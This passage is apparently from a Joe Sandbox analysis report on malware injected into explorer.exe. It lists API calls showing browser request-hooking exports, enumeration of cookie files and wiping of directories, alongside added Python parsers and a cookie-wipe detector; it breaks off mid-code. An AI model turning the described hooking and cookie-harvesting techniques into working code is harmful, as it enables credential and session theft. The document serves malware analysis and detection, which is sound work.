                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                                                                                                                                      • String ID: %s%s$*.*
                                                                                                                                                      • API String ID: 2055899612-705776850
                                                                                                                                                      • Opcode ID: b53d20ad07f861bd8e0066e27a34149781d908b368bd027c02ceeb200ed2e183
                                                                                                                                                      • Instruction ID: 58d5b8d08a077edaebf413e71792665a3ebc52febc2f5794ee610c5972db7cce
                                                                                                                                                      • Opcode Fuzzy Hash: b53d20ad07f861bd8e0066e27a34149781d908b368bd027c02ceeb200ed2e183
                                                                                                                                                      • Instruction Fuzzy Hash: 2211D6312043147BD310AB749C49ABF7BACEFA7355F040519FE5282292DB7499E582A6
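Read together, the three function listings above describe recognisable routines in the code injected into explorer.exe: the first (call sites 00163886 to 00163D82) builds a name from the module path and process id, hashes it through CryptoAPI (CryptCreateHash with 0x8003, which is CALG_MD5, and CryptGetHashParam with 2, HP_HASHVAL) before CreateMutexA, then compares the host image name against firefox.exe, chrome.exe, opera.exe, iexplore.exe, microsoftedgecp.exe and msedge.exe and resolves PR_Write in nspr4.dll/nss3.dll and HttpSendRequestA/W, InternetWriteFile and related exports in wininet.dll via GetModuleHandleA and GetProcAddress (on each GetModuleHandleA line the second value is the export the following GetProcAddress resolves); the second (001615EB to 001616AB) walks a directory with *.* and matches entries against Cookies*; the third (0016150D to 0016158F) walks a directory, sets each entry's attributes to 0x20 (FILE_ATTRIBUTE_ARCHIVE, which clears read-only, hidden and system) and deletes it, with RemoveDirectoryW in the mutually recursive caller 001613FE. The following parser and tagger, added here as an editor's example and not Joe Sandbox or SmokeLoader code, turns listing lines of this exact format into structured calls and applies hand-written heuristics for those three behaviours; the tag names, the browser list and the hooked-export table are the editor's assumptions, and the sample traces are constructed subsets of the listings above.

```python
"""Tag Joe Sandbox per-function API listings with behaviour heuristics.

Editor's example for this report, not Joe Sandbox code. The signature
table is a hand-written heuristic (assumption), and the sample traces are
constructed subsets of the listings above, in the same line format.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Lines: "• API.MODULE(args), ref: ADDR", optionally prefixed with
# "Part of subcall function ADDR:"; a few carry no argument list at all.
_LINE = re.compile(
    r"^\s*[•*-]\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[\w.]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: int                 # call-site address
    subcall: Optional[int]   # callee address for "Part of subcall" lines


def parse_trace(text: str) -> list:
    # Non-matching lines (headers such as "APIs" or "Strings") are skipped.
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if m:
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
            calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                                 int(m["sub"], 16) if m["sub"] else None))
    return calls


BROWSER_IMAGES = {"firefox.exe", "chrome.exe", "opera.exe", "iexplore.exe",
                  "microsoftedgecp.exe", "msedge.exe"}
# (module, export) pairs a form grabber resolves to hook outbound request bodies.
HOOK_EXPORTS = {("nspr4.dll", "PR_Write"), ("nss3.dll", "PR_Write"),
                ("wininet.dll", "HttpSendRequestA"), ("wininet.dll", "HttpSendRequestW"),
                ("wininet.dll", "InternetWriteFile")}


def browser_targets(calls) -> list:
    """Browser image names the routine compares its host process name against."""
    return sorted({c.args[1].lower() for c in calls
                   if c.api == "lstrcmpiA" and len(c.args) == 2
                   and c.args[1].lower() in BROWSER_IMAGES})


def resolved_exports(calls) -> list:
    """(module, export) pairs from GetModuleHandleA lines feeding GetProcAddress."""
    return sorted({(c.args[0].lower(), c.args[1]) for c in calls
                   if c.api == "GetModuleHandleA" and len(c.args) == 2})


def classify(calls) -> set:
    apis = {c.api for c in calls}
    tags = set()
    if browser_targets(calls):
        tags.add("browser-process-check")
    if set(resolved_exports(calls)) & HOOK_EXPORTS:
        tags.add("browser-network-export-resolution")
    # Module path and PID formatted, hashed with CryptoAPI, then used to name a mutex.
    if {"GetModuleFileNameA", "GetCurrentProcessId", "CryptHashData", "CreateMutexA"} <= apis:
        tags.add("mutex-from-hashed-path-and-pid")
    if any(c.api == "PathMatchSpecW" and any(a.startswith("Cookies") for a in c.args)
           for c in calls):
        tags.add("cookie-file-enumeration")
    if {"FindFirstFileW", "FindNextFileW", "DeleteFileW"} <= apis:
        tags.add("directory-wipe")
    return tags


# Constructed samples: subsets of the three listings above, copied line for line.
TRACE_BROWSER_HOOK = """APIs
  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00163886
  • GetCurrentProcessId.KERNEL32(00000001), ref: 0016389B
  • wsprintfA.USER32 ref: 001638B6
    • Part of subcall function 0016118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 001611C1
    • Part of subcall function 0016118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 001611D4
  • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 001638CD
  • lstrcmpiA.KERNEL32(00000000,firefox.exe), ref: 0016393C
  • GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 001639E1
  • lstrcmpiA.KERNEL32(00000000,chrome.exe), ref: 00163A6D
  • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 00163B2C
"""
TRACE_COOKIE_WALK = """  • PathCombineW.SHLWAPI(00000000,00000000,*.*,771EF770,00000000,76B2B2E0,777783D0), ref: 001615EB
  • FindFirstFileW.KERNELBASE(00000000,?), ref: 001615F7
  • PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 00161661
  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0016169C
"""
TRACE_WIPE = """  • FindFirstFileW.KERNELBASE(00000000,?), ref: 0016151C
  • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0016156A
  • DeleteFileW.KERNELBASE(00000000), ref: 00161571
  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00161584
"""
```

Feeding the three sample traces to classify(parse_trace(...)) yields the browser-check, export-resolution and mutex tags for the first, only cookie-file-enumeration for the second and only directory-wipe for the third; the heuristics are deliberately loose (a set of API names, not an ordered sequence) so that the "Part of subcall" lines, which interleave callee activity with the caller's own calls, do not break them.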

                                                                                                                                                      Control-flow Graph

                                                                                                                                                       Function 001613FE, blocks listed as id: address range, calls in the block -> successor blocks:
                                                                                                                                                       • 246: 1613fe-161444, call 161000, wsprintfW, FindFirstFileW -> 249, 250
                                                                                                                                                       • 249: 161446 -> 251
                                                                                                                                                       • 250: 1614c4-1614d5, call 161011 (no successors)
                                                                                                                                                       • 251: 16144a-16144f -> 254, 255
                                                                                                                                                       • 254: 161451-16145c, call 1613d7 -> 255, 259
                                                                                                                                                       • 255: 1614a9-1614b7, FindNextFileW -> 251, 257
                                                                                                                                                       • 257: 1614b9-1614c0, FindClose -> 250
                                                                                                                                                       • 259: 16145e-161499, call 161000, wsprintfW, call 1614d8 -> 264, 265
                                                                                                                                                       • 264: 1614a2-1614a4, call 161011 -> 255
                                                                                                                                                       • 265: 16149b-16149c, RemoveDirectoryW -> 264
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                      • wsprintfW.USER32 ref: 0016142A
                                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?), ref: 00161439
                                                                                                                                                      • wsprintfW.USER32 ref: 00161476
                                                                                                                                                        • Part of subcall function 001614D8: wsprintfW.USER32 ref: 0016150D
                                                                                                                                                        • Part of subcall function 001614D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0016151C
                                                                                                                                                        • Part of subcall function 001614D8: wsprintfW.USER32 ref: 00161557
                                                                                                                                                        • Part of subcall function 001614D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0016156A
                                                                                                                                                        • Part of subcall function 001614D8: DeleteFileW.KERNELBASE(00000000), ref: 00161571
                                                                                                                                                        • Part of subcall function 001614D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00161584
                                                                                                                                                        • Part of subcall function 001614D8: FindClose.KERNELBASE(00000000), ref: 0016158F
                                                                                                                                                      • RemoveDirectoryW.KERNELBASE(00000000), ref: 0016149C
                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 001614AF
                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 001614BA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                                                                                                                                      • String ID: %s%s$%s%s\$*.*
                                                                                                                                                      • API String ID: 2055899612-4093207852
                                                                                                                                                      • Opcode ID: 5a168f056a5d0d8930315b973f343e5fb3ee2eea6851683964748f77f0f4f5ed
                                                                                                                                                      • Instruction ID: 0c71ae2de1fb4c96234b4612a64bb1898b00ad321ec4d462530f45529d5c02d0
                                                                                                                                                      • Opcode Fuzzy Hash: 5a168f056a5d0d8930315b973f343e5fb3ee2eea6851683964748f77f0f4f5ed
                                                                                                                                                      • Instruction Fuzzy Hash: 2611E4312043407BD710AB25DC49ABF76ECEFE6341F08052CFA4183292DF7558A98662

                                                                                                                                                      Control-flow Graph
                                                                                                                                                      • Graph rendering omitted. Ten basic blocks spanning 163d8d-163e23: the entry block calls 161274 (VirtualQuery); two blocks each call 161000 (heap allocate) followed by RtlMoveMemory; block 163de8-163dfc issues NtUnmapViewOfSection; later blocks call 163862 and 163be1, and block 163e17-163e1b makes a recursive call to 163d8d.
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00161281
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00163DAF
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00163DE2
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00163DEB
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
                                                                                                                                                      • String ID: 0-vw
                                                                                                                                                      • API String ID: 4050682147-1459538145
                                                                                                                                                      • Opcode ID: 1a5d17a9c9d0ff7443f3c397e8875b1bd03d727d65115ec36f4a36c021ff6a99
                                                                                                                                                      • Instruction ID: 8baa5e8d6ab4753fdfc8edaa4132757e5f54f4d328d37c25fcc8e7ca52932f33
                                                                                                                                                      • Opcode Fuzzy Hash: 1a5d17a9c9d0ff7443f3c397e8875b1bd03d727d65115ec36f4a36c021ff6a99
                                                                                                                                                      • Instruction Fuzzy Hash: 7701D430404110EFC718ABA4DC58AB7BB58EF51312F148539F425871A1CB779AA1CBB0

                                                                                                                                                      Control-flow Graph
                                                                                                                                                      • Graph rendering omitted. Three basic blocks spanning 162ea8-162ed1: StrStrIA against the browser name list, a conditional call to 162e1b (the OpenProcess / NtQueryInformationProcess / "NetworkService" check), then return.
                                                                                                                                                      APIs
                                                                                                                                                      • StrStrIA.KERNELBASE(chrome.exe|opera.exe|msedge.exe,?,00000000,?,00163CD2), ref: 00162EB4
                                                                                                                                                        • Part of subcall function 00162E1B: OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00162EC5), ref: 00162E27
                                                                                                                                                        • Part of subcall function 00162E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00162E52
                                                                                                                                                        • Part of subcall function 00162E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00162E7F
                                                                                                                                                        • Part of subcall function 00162E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 00162E92
                                                                                                                                                      Strings
                                                                                                                                                      • chrome.exe|opera.exe|msedge.exe, xrefs: 00162EAB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$InformationQuery$Open
                                                                                                                                                      • String ID: chrome.exe|opera.exe|msedge.exe
                                                                                                                                                      • API String ID: 4117927671-3743313796
                                                                                                                                                      • Opcode ID: d8d8637bfb13b680642640e25bdb0347e5776ff2c0f6f9e6b24f7368c93fdae7
                                                                                                                                                      • Instruction ID: b4aff7b6b2f8f5e236d8613f9a306bb23cd52f57cf7c3f2de8f8119a6db343c1
                                                                                                                                                      • Opcode Fuzzy Hash: d8d8637bfb13b680642640e25bdb0347e5776ff2c0f6f9e6b24f7368c93fdae7
                                                                                                                                                      • Instruction Fuzzy Hash: 29D0A932300A200B672C267A6C0A86F948DCBC2A62302413EE802C3240EBA1CC9342A0
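The two listings above are easier to read once the numeric arguments are decoded: OpenProcess with 0x1000 is PROCESS_QUERY_LIMITED_INFORMATION, NtQueryInformationProcess class 0x3C (60) is ProcessCommandLineInformation (which is why the result is searched for "NetworkService", the name carried on the command line of the Chromium network-service child process), and the SHGetSpecialFolderPathW calls further down use CSIDL 0x1C (CSIDL_LOCAL_APPDATA) and 0x1A (CSIDL_APPDATA). The following parser is an added example, not part of the Joe Sandbox report or of the sample: it reads lines in the report's "APIs" format, separates direct calls from "Part of subcall function" entries, and annotates the arguments using the documented Win32/NT constant values. The regular expression and the constant tables are the author's own; the sample lines are copied from the listing.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function listing and decode the
numeric arguments that matter when reading this sample's behaviour.

Added example, not part of the report. The constant tables are the
documented Win32/NT values; the sample lines are copied from the listing."""
import re
from typing import Dict, List, Optional, Tuple

# The three line shapes that occur in the listing:
#   • OpenProcess.KERNEL32(00001000,...), ref: 00162E27
#   • Part of subcall function 00162E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 00162E92
#   • wsprintfW.USER32 ref: 00161476               (no argument list at all)
_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[\w.]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

PROCESS_ACCESS = {  # OpenProcess dwDesiredAccess bits
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
PROCESSINFOCLASS = {  # NtQueryInformationProcess second argument
    0: "ProcessBasicInformation", 7: "ProcessDebugPort",
    30: "ProcessDebugObjectHandle", 31: "ProcessDebugFlags",
    60: "ProcessCommandLineInformation",
}
CSIDL = {  # SHGetSpecialFolderPathW third argument
    0x05: "CSIDL_PERSONAL", 0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA",
    0x23: "CSIDL_COMMON_APPDATA", 0x28: "CSIDL_PROFILE",
}
TH32CS = {0x1: "TH32CS_SNAPHEAPLIST", 0x2: "TH32CS_SNAPPROCESS",
          0x4: "TH32CS_SNAPTHREAD", 0x8: "TH32CS_SNAPMODULE"}

# api name -> (argument index, decoding kind, lookup table)
_DECODERS = {
    "OpenProcess": (0, "flags", PROCESS_ACCESS),
    "NtQueryInformationProcess": (1, "enum", PROCESSINFOCLASS),
    "SHGetSpecialFolderPathW": (2, "enum", CSIDL),
    "CreateToolhelp32Snapshot": (0, "flags", TH32CS),
    "Sleep": (0, "ms", None),
}


def parse_api_line(line: str) -> Optional[Dict]:
    """Return {'api','module','args','ref','subcall_of'} or None for non-API lines."""
    m = _LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = raw.split(",") if raw is not None else []
    callee = m.group("callee")
    return {"api": m.group("api"), "module": m.group("module"), "args": args,
            "ref": m.group("ref").upper(),
            "subcall_of": callee.upper() if callee else None}


def _hexarg(arg: str) -> Optional[int]:
    """Joe Sandbox prints numeric arguments as hex; '?' and strings are not numbers."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode_args(call: Dict) -> List[str]:
    """Symbolic names for the argument that carries meaning for this API."""
    spec = _DECODERS.get(call["api"])
    if spec is None or spec[0] >= len(call["args"]):
        return []
    idx, kind, table = spec
    value = _hexarg(call["args"][idx])
    if value is None:
        return []
    if kind == "ms":
        return [f"{value} ms"]
    if kind == "enum":
        return [table.get(value, f"unknown(0x{value:X})")]
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)          # bits not covered by the table
    if leftover:
        names.append(f"0x{leftover:X}")
    return names or [f"0x{value:X}"]


def summarize(lines: List[str]) -> List[Tuple[str, str, str, str]]:
    """(ref address, owning function, API, decoded annotation) per API line."""
    rows = []
    for line in lines:
        call = parse_api_line(line)
        if call is None:
            continue
        owner = call["subcall_of"] or "this function"
        rows.append((call["ref"], owner, call["api"], " | ".join(decode_args(call))))
    return rows


# Lines copied from the listing above.
SAMPLE_LINES = [
    "• StrStrIA.KERNELBASE(chrome.exe|opera.exe|msedge.exe,?,00000000,?,00163CD2), ref: 00162EB4",
    "  • Part of subcall function 00162E1B: OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00162EC5), ref: 00162E27",
    "  • Part of subcall function 00162E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00162E52",
    "  • Part of subcall function 00162E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 00162E92",
    "• SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,00163839,?,00163C53,00000001), ref: 00163752",
    "• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00163C69",
    "• Sleep.KERNELBASE(000003E8), ref: 00163D82",
    "• wsprintfW.USER32 ref: 00161476",
    "Memory Dump Source",
]

if __name__ == "__main__":
    for ref, owner, api, note in summarize(SAMPLE_LINES):
        print(f"{ref}  {owner:14}  {api:26}  {note}")
```

Running it against the lines above yields, among others, `00162E27 00162E1B OpenProcess PROCESS_QUERY_LIMITED_INFORMATION`, `00162E52 00162E1B NtQueryInformationProcess ProcessCommandLineInformation` and `00163752 this function SHGetSpecialFolderPathW CSIDL_LOCAL_APPDATA`. The decoder only names values whose meaning is fixed by the API; a `?` argument (a value the sandbox could not resolve) is left undecoded rather than guessed.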

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00161374
                                                                                                                                                        • Part of subcall function 00161363: Process32First.KERNEL32(00000000,?), ref: 00161393
                                                                                                                                                        • Part of subcall function 00161363: CloseHandle.KERNELBASE(00000000), ref: 001613CB
                                                                                                                                                        • Part of subcall function 00161363: lstrcmpiA.KERNEL32(?), ref: 001613A3
                                                                                                                                                        • Part of subcall function 00161363: Process32Next.KERNEL32(00000000,00000128), ref: 001613C0
                                                                                                                                                      • Sleep.KERNELBASE(000003E8,?,00000000,00000001,?,?,00163839,?,00163C53,00000001), ref: 00163731
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,00163839,?,00163C53,00000001), ref: 00163752
                                                                                                                                                      • lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\,?,00000000,00000001,?,?,00163839,?,00163C53,00000001), ref: 00163764
                                                                                                                                                        • Part of subcall function 001615BE: PathCombineW.SHLWAPI(00000000,00000000,*.*,771EF770,00000000,76B2B2E0,777783D0), ref: 001615EB
                                                                                                                                                        • Part of subcall function 001615BE: FindFirstFileW.KERNELBASE(00000000,?), ref: 001615F7
                                                                                                                                                        • Part of subcall function 001615BE: lstrcmpiW.KERNEL32(?,001641C8), ref: 00161623
                                                                                                                                                        • Part of subcall function 001615BE: lstrcmpiW.KERNEL32(?,001641CC), ref: 00161633
                                                                                                                                                        • Part of subcall function 001615BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 0016164C
                                                                                                                                                        • Part of subcall function 001615BE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0016169C
                                                                                                                                                        • Part of subcall function 001615BE: FindClose.KERNELBASE(00000000), ref: 001616AB
                                                                                                                                                      • RtlZeroMemory.NTDLL(00000000,00001000), ref: 0016377A
                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,00163839,?,00163C53,00000001), ref: 00163783
                                                                                                                                                      • lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\,?,00000000,00000001,?,?,00163839,?,00163C53,00000001), ref: 0016378F
                                                                                                                                                      • RtlZeroMemory.NTDLL(00000000,00001000), ref: 001637A3
                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,00000001,?,?,00163839,?,00163C53,00000001), ref: 001637AC
                                                                                                                                                      • lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\,?,00000000,00000001,?,?,00163839,?,00163C53,00000001), ref: 001637B8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Path$FindFolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateCreateHandleProcessSleepSnapshotToolhelp32
                                                                                                                                                      • String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
                                                                                                                                                      • API String ID: 909495591-1175993956
                                                                                                                                                      • Opcode ID: 8c3fe6fd5d7552310033d6cfe6df86d191a6b40eda8b1586d578e2cd5332f0dc
                                                                                                                                                      • Instruction ID: 2fe5c585c4d9ce881a66550c8d877638ac6a8c38d57e17e69201fcef56ad4a3d
                                                                                                                                                      • Opcode Fuzzy Hash: 8c3fe6fd5d7552310033d6cfe6df86d191a6b40eda8b1586d578e2cd5332f0dc
                                                                                                                                                      • Instruction Fuzzy Hash: 1611216038136433E52033669C93FAF654EDFB3B91F050024F206AA6C1CFC09E6145BA

                                                                                                                                                      Control-flow Graph
                                                                                                                                                      • Graph rendering omitted. Basic blocks spanning 163be1-163d88: after two 161000 allocations, wsprintfA and 161235 (OpenFileMappingA / MapViewOfFile), with an optional path through 161141, 163829 and 161261, the function enters a polling loop: CreateToolhelp32Snapshot, a Process32First/Process32Next walk comparing each name with lstrcmpiA against firefox.exe, iexplore.exe and microsoftedgecp.exe and otherwise calling 162ea8 (the chrome.exe|opera.exe|msedge.exe / "NetworkService" check); a matching process is passed to 1612aa, 161305, 161320, 161274, 161090 and 161fe5 before the walk continues; after the walk, CloseHandle, Sleep(1000 ms) and back to the snapshot.
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                      • wsprintfA.USER32 ref: 00163C1F
                                                                                                                                                        • Part of subcall function 00161235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0016123F
                                                                                                                                                        • Part of subcall function 00161235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00163C33), ref: 00161251
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00163C69
                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 00163C88
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 00163CA1
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 00163CB1
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00163CC1
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00163D12
                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 00163D68
                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00163D77
                                                                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00163D82
                                                                                                                                                        • Part of subcall function 00161141: lstrlen.KERNEL32(?,?,?,00000000,?,001629DD,00000001), ref: 00161150
                                                                                                                                                        • Part of subcall function 00161141: lstrlen.KERNEL32(:method POST,?,00000000,?,001629DD,00000001), ref: 00161155
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateCloseCreateFirstHandleMappingNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                                                                                                      • String ID: %s%s$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe
                                                                                                                                                      • API String ID: 2509890648-2554907557
                                                                                                                                                      • Opcode ID: 7a75256cabe74ecfab72d1b60cc18460b5cf8bed88ccee7997fc02f262dbee60
                                                                                                                                                      • Instruction ID: 4a86f1521b6044efbaacb106ef790f9c29968ffb29f9e63ff6f57e5fca3ea254
                                                                                                                                                      • Opcode Fuzzy Hash: 7a75256cabe74ecfab72d1b60cc18460b5cf8bed88ccee7997fc02f262dbee60
                                                                                                                                                      • Instruction Fuzzy Hash: 8B412531204311ABCB14EBB4DC95A7F73ADAF95B40F040528F962936D1DB70DE66C6A2
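Taken together, the listings at 163731 and 163be1 describe a component that, from inside explorer.exe (the report's signatures note the sample injects into the Windows Explorer), polls the process list for browsers, opens matching browser processes with PROCESS_QUERY_LIMITED_INFORMATION (0x1000) to read their command line, and walks the Chrome, Edge and Opera profile directories looking for `Cookies*` files; the deletion routine at 1614d8 (SetFileAttributesW then DeleteFileW) is what the strings point at. The following detection logic is an added example, not part of the report or of the sample: it correlates, per source process, Sysmon-style ProcessAccess events (event 10) against browser images that carry the 0x1000 access bit with FileDelete events (23 or 26) on cookie stores under the profile paths named in the listings. The event field names (SourceImage, TargetImage, GrantedAccess, Image, TargetFilename) follow Sysmon's schema; the events themselves are constructed for the example.

```python
"""Correlate browser-process access with cookie-store deletion, per source process.

Added example, not part of the Joe Sandbox report or of the sample. Event
dictionaries mimic Sysmon fields; the sample events below are constructed."""
import fnmatch
from collections import defaultdict
from typing import Dict, List

# Browser images named in the listings (lstrcmpiA / StrStrIA targets).
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "opera.exe",
                  "firefox.exe", "iexplore.exe", "microsoftedgecp.exe"}
# Profile path fragments from the lstrcatW calls, lower-cased for matching.
PROFILE_FRAGMENTS = (
    "\\google\\chrome\\user data\\",
    "\\microsoft\\edge\\user data\\",
    "\\opera software\\opera stable\\",
    "\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\",
)
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000   # the OpenProcess mask in the listing


def basename(image: str) -> str:
    return image.lower().rsplit("\\", 1)[-1]


def is_cookie_store(path: str) -> bool:
    """True for a file named Cookies* inside one of the browser profile trees."""
    p = path.lower()
    return fnmatch.fnmatch(basename(p), "cookies*") and any(f in p for f in PROFILE_FRAGMENTS)


def detect_cookie_wipe(events: List[Dict]) -> List[Dict]:
    """One finding per non-browser process that both queried a browser process
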